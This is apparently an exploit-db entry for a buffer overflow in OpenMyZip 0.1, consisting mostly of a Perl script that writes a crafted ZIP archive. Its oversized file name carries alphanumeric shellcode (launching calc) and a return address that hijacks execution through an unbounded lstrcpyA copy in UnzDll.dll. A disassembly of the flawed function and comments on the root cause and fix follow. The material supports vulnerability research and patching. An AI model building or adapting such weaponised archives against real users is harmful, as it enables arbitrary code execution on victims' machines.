OpenMyZip 0.1 – ‘.zip’ Remote Buffer Overflow

  • 作者: C4SS!0 G0M3S
    日期: 2011-05-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35686/
  • source: https://www.securityfocus.com/bid/47678/info
    
    
    OpenMyZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
    
    Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
    
    OpenMyZip 0.1 is vulnerable; other versions may also be affected. 
    
    #!/usr/bin/perl
    #
    #
    #[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
    #[+]Date: 02\05\2011
    #[+]Author: C4SS!0 G0M3S
    #[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html
    #[+]Version: v0.1
    #[+]Tested On: WIN-XP SP3 Brazil Portuguese
    #[+]CVE: N/A
    #
    #
    #
    
    use strict;
    use warnings;
    
    # Proof-of-concept generator for the OpenMyZip 0.1 crash described above.
    # It writes a single archive, Exploit.zip, whose one entry has a ~4 KB file
    # name.  Per the author's notes in the POD block at the bottom, UnzDll.dll
    # copies that name with kernel32.lstrcpyA - which takes no length - into a
    # fixed-size buffer, so the archive's name-length field is never checked
    # against the destination.  The application-side fix is a bounded copy
    # (lstrcpynA / strncpy with the destination size) and rejecting entries
    # whose name length exceeds the buffer.
    my $filename = "Exploit.zip"; # output path: a fixed literal, nothing is read from @ARGV
    
    
    # Banner.
    print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";
    print "\t\tCreated by C4SS!0 G0M3S\n";
    print "\t\tE-mail Louredo_\@hotmail.com\n";
    print "\t\tSite www.exploit-br.org/\n\n";
    
    print "\n\n[+] Creting ZIP File...\n";
    sleep(1);
    # ZIP local file header (signature "PK\x03\x04").  The little-endian word
    # 0x0fe4 = 4068 equals the final length of $payload (4064 bytes + ".txt"),
    # so it is presumably meant as the file-name length field; the exact byte
    # alignment of the remaining fields is not verified here.
    my $head = "\x50\x4B\x03\x04\x14\x00\x00".
    "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\xe4\x0f" .
    "\x00\x00\x00";
    
    # Central directory file header (signature "PK\x01\x02"), carrying the same
    # 0x0fe4 name length.
    my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
    "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\xe4\x0f".
    "\x00\x00\x00\x00\x00\x00\x01\x00".
    "\x24\x00\x00\x00\x00\x00\x00\x00";
    
    # End of central directory record (signature "PK\x05\x06"); the 0x0001
    # words are presumably the entry counts for the single entry.
    my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
    "\x00\x01\x00\x01\x00".
    "\x12\x10\x00\x00".
    "\x02\x10\x00\x00".
    "\x00\x00";
    
    # The over-long entry name.  The inline stage comments below are the
    # author's; the name is padded to a fixed total of 4064 bytes (see the
    # length() arithmetic) before ".txt" is appended.
    my $payload = "\x41" x 8;
    $payload = $payload.
    ("\x61" x 7).#6 POPAD
    ("\x6A\x30").#PUSH 30
    ("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX
    ("\x41" x 10).#10 INC EAX
    ("\x02\xd3").#ADD CL,BL
    ("\x51\x58").#PUSH ECX / POP EAX
    ("\x98\xd1"); #BASE CONVERSION 
    # "\x98" == "\xff"
    # "\xd1" == "\xd0"
    # "\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}
    $payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE
    $payload .= 
    "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".
    "TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".
    "5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX
    "T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".
    "9K7OGT86OPYJ03K9GEU3OKXSKYZA";
    $payload .= "\x44" x (2050-length($payload)); # pad to offset 2050
    $payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098
    "\x41" x 5;# PADDING FOR OVERWRITE EIP
    $payload .= pack('V',0x00404042);#JMP EBX
    $payload .= "\x42" x 50;
    $payload .= "\x41" x (4064-length($payload)); # pad to the fixed total of 4064 bytes
    
    $payload = $payload.".txt"; # final name length: 4068 = 0x0fe4, matching the headers above
    # Same name in both the local header and the central directory entry.
    my $zip = $head.$payload.$head2.$payload.$head3;
    # Bareword handle and two-argument open; tolerable only because $filename
    # is a fixed literal (no mode injection possible).  The idiom is
    # open my $fh, '>', $filename or die ...; close is also unchecked, so a
    # failed buffered write would go unreported.
    open(FILE,">$filename") || die "[-]Error:\n$!\n";
    print FILE $zip;
    close(FILE);
    print "[+] ZIP File Created With Sucess:)\n";
    sleep(2);
    =head1 Vulnerable function
    #
    #The Vulnerable Function:
    #
    #
    #The Vulnerable function is in MODULE UnzDll.dll on
    #Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA
    #the buffer overflow occurs when the oversized string is copied.
    #
    #Root cause: lstrcpyA has no length parameter, so the copy is bounded only
    #by the source string.  A bounded copy (lstrcpynA with the destination
    #size) or a check of the name-length field before the copy prevents it.
    #
    #Assemble:
    #
    #0x00DA6A6F53 PUSH EBX
    #0x00DA6A7056 PUSH ESI
    #0x00DA6A718B75 08MOV ESI,DWORD PTR SS:[EBP+8]
    #0x00DA6A748B55 18MOV EDX,DWORD PTR SS:[EBP+18]
    #0x00DA6A778B45 10MOV EAX,DWORD PTR SS:[EBP+10]
    #0x00DA6A7A83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0
    #0x00DA6A818D9E 50D80000LEA EBX,DWORD PTR DS:[ESI+D850]
    #0x00DA6A8774 65JE SHORT UnzDll.00DA6AEE
    #0x00DA6A898B8E 84D20000MOV ECX,DWORD PTR DS:[ESI+D284]
    #0x00DA6A8F890B MOV DWORD PTR DS:[EBX],ECX
    #0x00DA6A918B8E 88D20000MOV ECX,DWORD PTR DS:[ESI+D288]
    #0x00DA6A97894B 04MOV DWORD PTR DS:[EBX+4],ECX
    #0x00DA6A9A33C9 XOR ECX,ECX
    #0x00DA6A9CC743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0
    #0x00DA6AA3894B 0CMOV DWORD PTR DS:[EBX+C],ECX
    #0x00DA6AA68B4D 0CMOV ECX,DWORD PTR SS:[EBP+C]
    #0x00DA6AA9894B 10MOV DWORD PTR DS:[EBX+10],ECX
    #0x00DA6AAC81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91
    #0x00DA6AB67F 0AJG SHORT UnzDll.00DA6AC2
    #0x00DA6AB88BC8 MOV ECX,EAX
    #0x00DA6ABA80E1 FFAND CL,0FF
    #0x00DA6ABD0FBEC9 MOVSX ECX,CL
    #0x00DA6AC0EB 02JMP SHORT UnzDll.00DA6AC4
    #0x00DA6AC28BC8 MOV ECX,EAX
    #0x00DA6AC4894B 14MOV DWORD PTR DS:[EBX+14],ECX
    #0x00DA6AC785D2 TEST EDX,EDX
    #0x00DA6AC98B45 14MOV EAX,DWORD PTR SS:[EBP+14]
    #0x00DA6ACC8943 18MOV DWORD PTR DS:[EBX+18],EAX
    #0x00DA6ACF75 06JNZ SHORT UnzDll.00DA6AD7
    #0x00DA6AD1C643 1C 00 MOV BYTE PTR DS:[EBX+1C],0
    #0x00DA6AD5EB 0AJMP SHORT UnzDll.00DA6AE1
    #0x00DA6AD752 PUSH EDX
    #0x00DA6AD88D53 1CLEA EDX,DWORD PTR DS:[EBX+1C]
    #0x00DA6ADB52 PUSH EDX
    #0x00DA6ADCE8 ABF20000CALL UnzDll.00DB5D8C ; JMP to kernel32.lstrcpyA (unbounded copy of the entry name)
    #0x00DA6AE153 PUSH EBX
    #0x00DA6AE2FF96 8CD20000CALL DWORD PTR DS:[ESI+D28C] ; indirect call through a pointer the overflow can overwrite - this is where control is lost
    #0x00DA6AE80986 70D20000OR DWORD PTR DS:[ESI+D270],EAX
    #0x00DA6AEE5E POP ESI
    #0x00DA6AEF5B POP EBX
    #0x00DA6AF05D POP EBP
    #0x00DA6AF1C3 RETN
    #
    #
    #
    #
    #
    =cut